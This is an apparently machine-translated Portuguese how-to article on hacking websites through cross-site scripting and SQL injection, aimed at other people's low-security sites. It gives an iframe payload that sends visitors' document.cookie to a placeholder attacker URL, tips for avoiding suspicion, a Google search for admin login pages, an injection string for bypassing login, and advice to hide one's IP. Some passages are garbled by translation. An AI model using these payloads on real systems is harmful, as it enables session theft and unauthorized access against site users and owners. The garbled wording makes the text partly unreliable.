Como cortar um website

3 Métodos:

Conteúdo

Com Cross Site ScriptingExecuta ataques de injeçãoPrepare-se para ter sucesso

notaEste artigo é estritamente criado para fins educacionais, seja para ajudar as pessoas a aprender a se tornar um alvo hacker ou para demonstrar como hackers devem trabalhar para proteger melhor o seu chapéu de websites. Este tutorial irá fornecer os passos para obter o acesso a muitos sites de baixa segurança.

método 1Com Cross Site Scripting

1

Procurando um lugar vulnerável, onde você pode publicar conteúdo. Um quadro de avisos é um bom exemplo. Lembre-se, se o site é seguro, isto não vai funcionar.

2

Criar uma publicação. É necessário introduzir um código especial na "publicação" que irá capturar os dados de todos os que clicam nele.

  • Tente descobrir se o sistema de filtro filtra o código externo. Mensagem de alerta ("teste") (Eliminando "...".) Se uma caixa de alerta aparece quando você clica a publicação, em seguida, o site é vulnerável a ataques.

3

Criar e fazer upload de seus cookies grabber. O objetivo deste ataque é capturar os cookies de usuários, permitindo-lhe aceder às suas contas em sites que são vulneráveis ​​sessão mais cedo. Você precisa de um grabber que os cookies de captura de cookies e redirecionar seu objetivo. Faça o upload do grabber para um site a que você tem acesso e apoiar php. Mais tarde nós vamos dar-lhe um exemplo de cookies grabber código.

4

Faça um post com os cookies grabber. Digite um código apropriado na publicação para capturar os biscoitos e enviá-los para o seu site. Nós recomendamos que você colocar algum texto após o código para reduzir as suspeitas e evitar a sua publicação é eliminado.

  • Um código de exemplo seria: lt; ... ... iframe frameborder = 0 height = 0 width = 0 src = javascript ...: void (document.location ="YourURL / cookiecatcher.php? C ="+ Document.cookie) gt; lt; ... / iframegt; (eliminando "...".)

5

Utiliza cookies que você coletou. Então você pode usar as informações dos cookies, que já estão armazenados no seu web site com a finalidade de que necessita.



método 2Executa ataques de injeção

1

À procura de um local vulnerável. Você precisa encontrar um site que é vulnerável a ter um gerenciador de login que é facilmente acessível. Tente pesquisar na login.asp administrador Google.

2

Inicie a sessão como administrador. escrever "administrador" como nome de usuário e usar qualquer uma das várias cadeias como a senha. Estes podem ser alguns dos diferentes cadeias, mas um exemplo comum seria 1`o`1 `=` 1.

3

Tenha paciência. Isso pode exigir várias tentativas e erros.

4

Acesse o site. No final, você é suposto a encontrar um fio para dar-lhe acesso de administrador para qualquer site, se este é vulnerável a ataques.

método 3Prepare-se para ter sucesso

1

Saiba um ou duas linguagens de programação. Se você realmente quer aprender a hackear sites, você precisa entender como computadores e outras tecnologias funcionam. Aprenda a usar linguagens de programação como Python ou SQL, para que você possa ter mais controle sobre os computadores e identificar vulnerabilidades nos sistemas.

2

Saiba HTML básico. Você também precisa ter uma compreensão ampla de HTML e javascript se você tentar hackear websites em particular. Saiba que pode levar algum tempo, mas há muitas maneiras livres para aprender on-line, de modo que você pode ter uma oportunidade se você quiser levá-lo.

3

Consulta com hackers de chapéu branco. White hat hackers são hackers que usam seu potencial para o bem, para expor vulnerabilidades de segurança e tornar a Internet um lugar melhor para todos. Se você quer aprender como cortar e usar suas habilidades para o bem ou se você quiser proteger o seu próprio site, recomendamos que você entre em contato com um hacker de chapéu branco para pedir seu conselho.

4

Pesquisa sobre o assunto. Se você quer aprender como cortar ou apenas quer protegê-lo, você precisa pesquisar muito sobre o assunto. Há muitas maneiras em que um Web site pode ser vulnerável e a lista está em constante mudança, por isso você deve manter a aprendizagem permanente.

5

Mantenha-se atualizado. Como a lista de possíveis ataques está mudando constantemente, você precisa ter certeza de que você está sempre atualizado. O fato de que você pode se proteger de qualquer tipo de ataque, não significa que você estará seguro no futuro!

dicas

  • Visite fóruns de hackers para obter dicas.

avisos

  • Se você estiver indo para invadir o mundo real, ocultar o seu IP usando software disponíveis on-line.
  • Leia nosso artigo que você não vai se tornar imediatamente um hacker. Você deve explorar suas habilidades e praticar constantemente.

Artigos Relacionados